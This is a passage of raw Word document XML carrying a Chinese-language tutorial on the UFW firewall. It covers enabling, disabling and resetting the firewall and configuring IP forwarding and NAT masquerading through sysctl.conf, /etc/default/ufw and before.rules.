        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并激活所有规则，运行命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo ufw enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F60C9D8" w14:textId="77777777" w:rsidR="00FA0EB1" w:rsidRDefault="00FA0EB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2C629F" w14:textId="77777777" w:rsidR="00FA0EB1" w:rsidRDefault="00FA0EB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UFW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将禁用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UFW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并删除所有活动规则。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果您不想还原所有更改并重新开始，这将很有帮助。要重置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UFW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以运行命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo ufw reset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D0510B" w14:textId="77777777" w:rsidR="00FA0EB1" w:rsidRDefault="00FA0EB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C1E052" w14:textId="77777777" w:rsidR="00FA0EB1" w:rsidRPr="00BE0D40" w:rsidRDefault="00FA0EB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE0D40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw disable #</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0D40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>禁用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C79503" w14:textId="77777777" w:rsidR="00FA0EB1" w:rsidRPr="00BE0D40" w:rsidRDefault="00FA0EB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE0D40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw enable #</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0D40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0267DE97" w14:textId="21AC6B29" w:rsidR="00336F8D" w:rsidRDefault="00FA0EB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE0D40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw reset #</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0D40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>重置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7E392E" w14:textId="6E97B9EA" w:rsidR="00336F8D" w:rsidRDefault="00336F8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC444C9" w14:textId="791F1AA6" w:rsidR="00FA0EB1" w:rsidRDefault="00B643F8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD5AF5A" w14:textId="7461B5B3" w:rsidR="00FA0EB1" w:rsidRDefault="00FA0EB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C99D050" w14:textId="3D8AE653" w:rsidR="000B0D7E" w:rsidRDefault="000B0D7E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪装是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内核中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络地址转换的一种变体，它通过重写源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址和目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址端口来转换网络流量。借助</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪装，您可以使用一台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算机充当网关，允许私有网络中的一台或多台计算机与互联网通信。例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VMware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Virtualbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此类虚拟软件就是通过一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>适配器充当网卡，转发多台虚拟机网络数据，连接到互联网。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D9549E" w14:textId="77777777" w:rsidR="000B0D7E" w:rsidRDefault="000B0D7E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53901D25" w14:textId="77777777" w:rsidR="000B0D7E" w:rsidRPr="000B0D7E" w:rsidRDefault="000B0D7E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UFW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪装涉及几个步骤。</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0D7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>首先，您需要启用</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0D7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0D7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>转发</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0D7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ip_forward</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0D7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABAF5EC" w14:textId="77777777" w:rsidR="000B0D7E" w:rsidRDefault="000B0D7E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344AFC41" w14:textId="24D1CF2F" w:rsidR="000B0D7E" w:rsidRDefault="000B0D7E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请使用你喜欢的编辑器编辑</w:t>
      </w:r>
      <w:r w:rsidRPr="00480A23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/etc/ufw/sysctl.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，在本教程中将使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编辑器打开文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E59F1E" w14:textId="7990030C" w:rsidR="000B0D7E" w:rsidRDefault="000B0D7E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00410076">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo vim /etc/ufw/sysctl.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3916161E" w14:textId="77777777" w:rsidR="000B0D7E" w:rsidRDefault="000B0D7E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找并取消注释以下行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638493A1" w14:textId="1F5B5D09" w:rsidR="00C103CD" w:rsidRDefault="000B0D7E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00410076">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>net/ipv4/ip_forward=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27310EF2" w14:textId="77777777" w:rsidR="00C103CD" w:rsidRDefault="00C103CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B885DF" w14:textId="237DA5A5" w:rsidR="00B643F8" w:rsidRDefault="009E04DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009E04DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>您还需要配置</w:t>
      </w:r>
      <w:r w:rsidRPr="009E04DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UFW</w:t>
      </w:r>
      <w:r w:rsidRPr="009E04DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以允许转发数据包。打开</w:t>
      </w:r>
      <w:r w:rsidRPr="009E04DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UFW</w:t>
      </w:r>
      <w:r w:rsidRPr="009E04DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00410076">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/etc/default/ufw</w:t>
      </w:r>
      <w:r w:rsidRPr="009E04DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。找到</w:t>
      </w:r>
      <w:r w:rsidRPr="009E04DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DEFAULT_FORWARD_POLICY</w:t>
      </w:r>
      <w:r w:rsidRPr="009E04DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键，然后将值</w:t>
      </w:r>
      <w:r w:rsidRPr="005F5A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidRPr="005F5A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>DROP</w:t>
      </w:r>
      <w:r w:rsidRPr="005F5A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>更改为</w:t>
      </w:r>
      <w:r w:rsidRPr="005F5A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ACCEPT</w:t>
      </w:r>
      <w:r w:rsidRPr="009E04DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD06741" w14:textId="77777777" w:rsidR="005F5A82" w:rsidRDefault="005F5A82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00716FC8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo vim /etc/default/ufw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F15EC92" w14:textId="77777777" w:rsidR="005F5A82" w:rsidRDefault="005F5A82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67219393" w14:textId="77777777" w:rsidR="005F5A82" w:rsidRDefault="005F5A82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DEFAULT_FORWARD_POLICY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3471088C" w14:textId="0E2755E2" w:rsidR="00B643F8" w:rsidRDefault="005F5A82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00716FC8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>DEFAULT_FORWARD_POLICY="ACCEPT"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105515F3" w14:textId="2B37BC0F" w:rsidR="00B643F8" w:rsidRDefault="00B643F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14364872" w14:textId="5FF21D49" w:rsidR="00B643F8" w:rsidRDefault="0067563A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0067563A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在，您需要在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66644">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66644">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="0067563A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66644">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>POSTROUTING</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66644">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>链</w:t>
      </w:r>
      <w:r w:rsidRPr="0067563A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的默认策略和伪装规则。</w:t>
      </w:r>
      <w:r w:rsidRPr="0067563A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0067563A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请打开</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66644">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/etc/ufw/before.rules</w:t>
      </w:r>
      <w:r w:rsidRPr="0067563A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665A5CF3" w14:textId="23AFC4C6" w:rsidR="0067563A" w:rsidRDefault="00F66644" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F66644">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sudo vim /etc/ufw/before.rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0323DE1E" w14:textId="5C80F7EC" w:rsidR="0067563A" w:rsidRDefault="00F66644" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F66644">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>追加以下几行到文件</w:t>
      </w:r>
      <w:r w:rsidR="00C05727" w:rsidRPr="00C05727">
        <w:t>/etc/ufw/before.rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7534A8" w14:textId="77777777" w:rsidR="003D0850" w:rsidRPr="003D0850" w:rsidRDefault="003D0850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">#NAT table rules </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>启用</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">nat </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D71C9D4" w14:textId="77777777" w:rsidR="003D0850" w:rsidRPr="003D0850" w:rsidRDefault="003D0850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>*nat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215897B8" w14:textId="77777777" w:rsidR="003D0850" w:rsidRPr="003D0850" w:rsidRDefault="003D0850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>允许</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">POSTROUTING </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC12F2E" w14:textId="77777777" w:rsidR="003D0850" w:rsidRPr="003D0850" w:rsidRDefault="003D0850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>:POSTROUTING ACCEPT [0:0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343BE089" w14:textId="77777777" w:rsidR="003D0850" w:rsidRPr="003D0850" w:rsidRDefault="003D0850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7821C607" w14:textId="77777777" w:rsidR="003D0850" w:rsidRPr="003D0850" w:rsidRDefault="003D0850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>转发</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>eth0</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>接口的数据包，请将</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>eth0</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>更改为你对应的接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B6E7B7" w14:textId="77777777" w:rsidR="003D0850" w:rsidRPr="003D0850" w:rsidRDefault="003D0850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>-A POSTROUTING -s 10.8.0.0/16 -o eth0 -j MASQUERADE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE423FB" w14:textId="77777777" w:rsidR="003D0850" w:rsidRPr="003D0850" w:rsidRDefault="003D0850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34453F7B" w14:textId="77777777" w:rsidR="003D0850" w:rsidRPr="003D0850" w:rsidRDefault="003D0850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># don't delete the 'COMMIT' line or these rules won't be processed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1188100B" w14:textId="5FA12FB8" w:rsidR="0067563A" w:rsidRDefault="003D0850" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003D0850">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>COMMIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A27613" w14:textId="389867FB" w:rsidR="00B643F8" w:rsidRDefault="00B643F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
